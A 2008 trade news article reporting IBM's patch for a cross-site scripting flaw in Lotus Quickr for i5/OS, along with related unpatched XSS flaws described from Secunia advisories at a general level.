IBM Patches Security Flaw in Quickr for i5/OS
February 26, 2008 Alex Woodie
IBM has issued a patch for a cross-site scripting security vulnerability in Lotus Quickr for i5/OS, the computer security research and development company Secunia reported last week. The flaw was given a “less critical” rating. Meanwhile, another security flaw in i5/OS reported earlier this month has been partially patched by IBM.
According to a Secunia advisory published last week, a security vulnerability in Lotus Quickr for i5/OS version 8 can be exploited by hackers to conduct cross-site scripting attacks. The problem is the result of not properly validating certain input before it’s returned to a user when anonymous access is disabled on HTTP ports, Secunia says. As a result, hackers can execute arbitrary HTML or inject malicious code or scripts into the Web pages viewed by others.
The vulnerability is reported in Lotus Quickr for i5/OS versions prior to 184.108.40.206 Hotfix 11 on Domino version 7.0.2, according to Secunia. The problem is resolved with the application of Hotfix 11 for Lotus Quickr for i5/OS.
The discovery of the cross-site scripting flaw in Lotus Quickr for i5/OS led to the discovery of another cross-site scripting flaw in Lotus Quickr version 8 and Lotus QuickPlace version 7, according to Secunia. The security firm says an Avnet researcher found a problem with the way the products handle the “OpenDocument” command. The flaw was reported just yesterday, and is currently marked as not patched.
This is the second reported security flaw in i5/OS or an IBM i5/OS application this month. In early February, IBM reported a flaw in the HTTP Server in i5/OS V5R3 and V5R4 that could lead to cross-site scripting attacks. That flaw was patched for V5R3 by IBM a week and a half ago, according to Secunia, but not for V5R4.
Lotus Quickr is one of a new class of Web 2.0 applications to make their way to the System i platform. The product, which was launched last June to much IBM fanfare, is designed to allow business users to view, edit, share, and distribute their documents and ideas using Web 2.0-style interfaces, such as blogs, wikis, and RSS feeds, along with their Lotus or Microsoft e-mail.